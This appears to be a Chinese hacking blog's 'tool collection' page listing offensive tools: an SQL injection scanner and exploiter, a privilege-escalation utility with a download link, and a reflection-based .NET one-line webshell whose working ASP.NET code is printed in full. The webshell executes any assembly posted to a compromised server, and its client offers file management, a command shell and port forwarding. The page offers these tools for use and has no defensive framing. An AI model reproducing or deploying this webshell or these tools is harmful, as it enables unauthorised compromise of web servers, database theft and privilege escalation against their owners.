分类 ‘工具收集’ 下的日志
SCRT Mini MySqlat0r-Java写的mysql注入检测工具
Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.
The Crawler modules allows the user to view the web site structure and gather all tamperable parameters. These parameters are then sent to the Tester module that tests all parameters for SQL injection vulnerabilities. If any are found, they are then sent to the Exploiter module that can exploit the injections to gather data from the database.
阅读全文 »
新型 .net 一句话及客户端
鬼仔注:刚从外面回来,看到cnqing在gtalk上给我的留言,只扔给一个链接。
作者:cnqing
软件说明:
程序包 包括一个基于反射的.net 一句话木马。
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »
Dbshell
来源:WEB安全手册
DB_OWNER权限备份hta到启动项提权的小工具。

下载地址:http://dl.getdropbox.com/u/216079/dbshell.exe
Tags: DB_OWNER, hta